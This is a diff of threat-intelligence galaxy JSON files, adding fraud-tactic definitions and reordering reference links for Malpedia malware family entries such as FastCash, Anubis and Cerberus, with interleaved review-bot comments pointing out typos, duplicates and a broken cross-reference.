+ "description": "CPP analysis identifies Payment Terminal parking, transport, fuel, etc. locations, from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "e89436a5-1b58-5676-a34d-d654c59a7d32",
+ "value": "Skimming - CPP UPT"
+ },
+ {
+ "description": "Same as e-Skimming",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "80165f05-1c1d-5f41-96b6-464ac065b052",
+ "value": "Skimming - CPP Virtual Terminal"
+ },
+ {
+ "description": "Unauthorized physical ATM manipulation, preventing card from being returned to customer - SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "493b35ed-9415-5de5-a5cb-298f169cc4f4",
+ "value": "Card Trapping"
+ },
+ {
+ "description": "Patch management is the best practice of upgrading existing software applications to remove any weak security patches that could be exploited by hackers. Lack of proper patching allows cyber criminals to exploit systems and networks.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "0e7a4057-d84b-5451-9006-5a5efe9e948a",
+ "value": "Lack of Patching / Security"
+ },
+ {
+ "description": "Process where an information system is deployed into a Production Environed with faults, errors or vulnerabilities",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b132c566-7656-5b2b-b157-5734c9e30cc8",
+ "value": "Bad implementation"
+ },
+ {
+ "description": "Implementation of a system, solution or service not according to defined and tested best practices.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "dd09e952-7992-5a37-a9c4-ed978d89a939",
+ "value": "Deployment Error"
+ },
+ {
+ "description": "Merchants not following best practice procedures to avoid criminal or fraudulent activity,",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "39a06139-ece8-5d8c-947e-cf0b4dbdccf6",
+ "value": "Merchant Negligence"
+ },
+ {
+ "description": "Implementation of a sstem, solution or service not according to defined and tested standards",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Due Diligence"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "a52f8c2e-4a38-5b1b-a4b0-4710606cd86f",
+ "value": "Implementation not according to Standards"
}
],
- "version": 4
+ "version": 6
}
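Review bot: several of the new attck4fraud descriptions carry typos and copy-paste residue that will be shown verbatim in the galaxy UI: `"Production Environed"` in the Bad implementation entry should read "Production Environment", `"Implementation of a sstem, solution or service"` in Implementation not according to Standards should read "system", and the Merchant Negligence description ends in a stray comma (`"...to avoid criminal or fraudulent activity,"`). The Bad implementation and Deployment Error descriptions also read as swapped (the first describes deploying into production with faults, the second an implementation not following best practice), and Implementation not according to Standards is a near-duplicate of Deployment Error with "best practices" replaced by "standards", so the three should be disambiguated or merged. "Same as e-Skimming" leaves Skimming - CPP Virtual Terminal without a standalone definition, and the "SEE FULL TERMINAL FRAUD DEFINITION" pointer in Card Trapping refers to a document that is not part of the cluster; either inline the relevant text or drop the pointer. Finally, `version` goes from 4 to 6; please confirm 5 was not skipped by accident.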
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index b9b0fd8..dc625e6 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -20,35 +20,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://github.com/fboldewin/FastCashMalwareDissected/",
- "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A",
- "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.youtube.com/watch?v=zGvQPtejX9w",
- "https://www.us-cert.gov/ncas/alerts/TA18-275A",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
- "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://www.youtube.com/watch?v=zGvQPtejX9w",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
+ "https://github.com/fboldewin/FastCashMalwareDissected/",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
+ "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
- "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware"
+ "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e306fe62-c708-11e8-89f2-073e396e5403",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e8a04177-6a91-46a6-9f63-6a9fac4dfa02",
"value": "FastCash"
},
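Review bot: the only semantic change in this hunk is the deletion of the `related` block linking FastCash to `e306fe62-c708-11e8-89f2-073e396e5403` with `estimative-language:likelihood-probability="almost-certain"`; the thirteen removed refs are all re-added in a different order, so the set of references is unchanged. Dropping a `related` entry silently breaks that cross-galaxy relationship for anyone pivoting on it, so either state in the PR why the link no longer holds or keep the block. The reordering also makes this hunk (and the rest of the file) far noisier than its content warrants; sorting `refs` deterministically in the generator before emitting would keep future diffs reviewable. Minor: `https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware` and `https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware` are the same post on two hostnames.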
@@ -70,12 +61,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot",
- "https://twitter.com/_icebre4ker_/status/1460527428544176128",
"https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/",
+ "https://twitter.com/_icebre4ker_/status/1460527428544176128",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes",
"https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/",
- "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
+ "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/"
],
"synonyms": [
"Escobar"
@@ -91,8 +82,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu",
"https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign"
+ "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
],
"synonyms": [],
"type": []
@@ -106,8 +97,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
- "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/",
- "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html"
+ "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html",
+ "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/"
],
"synonyms": [
"AxeSpy"
@@ -149,10 +140,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://securelist.com/transparent-tribe-part-2/98233/",
"https://www.secrss.com/articles/24995",
- "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/",
- "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset"
+ "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
+ "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/"
],
"synonyms": [],
"type": []
@@ -166,14 +158,17 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
"https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
"https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
+ "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
"https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing",
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
"https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/",
- "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf"
+ "https://twitter.com/_CPResearch_/status/1603375823448317953",
+ "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
+ "https://muha2xmad.github.io/malware-analysis/alien/"
],
"synonyms": [
"AlienBot"
@@ -205,22 +200,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa",
- "https://twitter.com/_icebre4ker_/status/1416409813467156482",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://gbhackers.com/teabot-banking-trojan/",
- "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
"https://twitter.com/ThreatFabric/status/1394958795508523008",
- "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
- "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
+ "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
"https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
- "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf",
+ "https://twitter.com/_icebre4ker_/status/1416409813467156482",
+ "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
+ "https://gbhackers.com/teabot-banking-trojan/",
+ "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
"https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
- "https://labs.k7computing.com/?p=22407",
- "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/",
"https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html",
+ "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf",
"https://www.cleafy.com/documents/teabot",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
"https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf",
- "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/"
+ "https://labs.k7computing.com/?p=22407"
],
"synonyms": [
"ReBot",
@@ -237,15 +232,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
- "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
"https://github.com/DesignativeDave/androrat",
"https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
"https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
"https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
"https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg"
],
"synonyms": [],
@@ -259,34 +254,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "https://www.youtube.com/watch?v=U0UsfO-0uJM",
- "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://muha2xmad.github.io/malware-analysis/anubis/",
- "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
- "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
- "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
- "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
"https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
+ "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
+ "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
"https://0x1c3n.tech/anubis-android-malware-analysis",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
+ "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
"https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
+ "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb",
+ "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://muha2xmad.github.io/malware-analysis/anubis/",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
"https://community.riskiq.com/article/85b3db8c",
"https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
- "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
- "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
- "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb"
+ "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
+ "https://www.youtube.com/watch?v=U0UsfO-0uJM",
+ "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
+ "https://assets.virustotal.com/reports/2021trends.pdf"
],
"synonyms": [
"BankBot",
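Review bot: the re-emitted Anubis refs keep a duplicate that differs only by a trailing space: `"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/"` and `"https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ "`. The whitespace variant was already present on the removed side of this hunk and is simply carried over, so the generator should strip whitespace from refs and deduplicate before writing; otherwise it will survive every regeneration.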
@@ -303,8 +298,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/",
- "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf"
+ "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
],
"synonyms": [],
"type": []
@@ -317,8 +312,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.asacub",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/"
+ "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [],
"type": []
@@ -385,12 +380,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut",
- "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/",
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
+ "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/",
+ "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf",
- "https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/"
+ "https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw"
],
"synonyms": [],
"type": []
@@ -404,8 +400,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke",
"https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/",
- "https://twitter.com/LukasStefanko/status/1280243673100402690",
- "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE"
+ "https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE",
+ "https://twitter.com/LukasStefanko/status/1280243673100402690"
],
"synonyms": [],
"type": []
@@ -418,13 +414,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian",
+ "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
+ "https://www.youtube.com/watch?v=DPFcvSy4OZk",
"https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56",
"https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html",
- "https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html",
- "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
"https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
- "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726",
- "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221"
+ "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
+ "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
+ "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726"
],
"synonyms": [
"Hydra"
@@ -432,19 +429,32 @@
"type": []
},
"uuid": "1faaa5c5-ab4e-4101-b2d9-0e12207d70fc",
- "value": "BianLian"
+ "value": "BianLian (Android)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.brasdex",
+ "https://www.threatfabric.com/blogs/brasdex-a-new-brazilian-ats-malware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "dc5408e9-e9e8-44fd-ac5c-231483d0ebe3",
+ "value": "BrasDex"
},
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata",
- "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html",
"https://securelist.com/spying-android-rat-from-brazil-brata/92775/",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again",
"https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account",
- "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat"
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html",
+ "https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat",
+ "https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again"
],
"synonyms": [
"AmexTroll"
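Review bot: renaming the existing cluster's `value` from "BianLian" to "BianLian (Android)" changes the name that tags and lookups are built from, so anything referencing the cluster by its old name will no longer match even though the UUID `1faaa5c5-ab4e-4101-b2d9-0e12207d70fc` is kept; add "BianLian" to `synonyms` alongside "Hydra" to preserve the lookup and explain the rename in the PR description. The new BrasDex cluster is added with `"description": ""`; a one-line summary drawn from the linked ThreatFabric post would make it usable in the UI. The empty `synonyms` and `type` arrays match the neighbouring entries, so that part is fine.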
@@ -459,6 +469,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda",
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
+ "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
"https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf"
],
"synonyms": [],
@@ -485,6 +497,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat",
+ "https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/",
"https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html"
],
"synonyms": [],
@@ -525,25 +538,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus",
- "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
- "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/",
- "https://nur.pub/cerberus-analysis",
- "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
- "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
- "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
- "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
"https://www.biznet.com.tr/wp-content/uploads/2020/08/Cerberus.pdf",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://twitter.com/AndroidCerberus",
- "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus",
- "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
- "https://github.com/ics-iot-bootcamp/cerberus_research",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf",
+ "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
"https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html",
+ "https://nur.pub/cerberus-analysis",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://securelist.com/the-state-of-stalkerware-in-2021/106193/",
+ "https://blog.cyberint.com/cerberus-is-dead-long-live-cerberus",
+ "https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/",
+ "https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://github.com/ics-iot-bootcamp/cerberus_research",
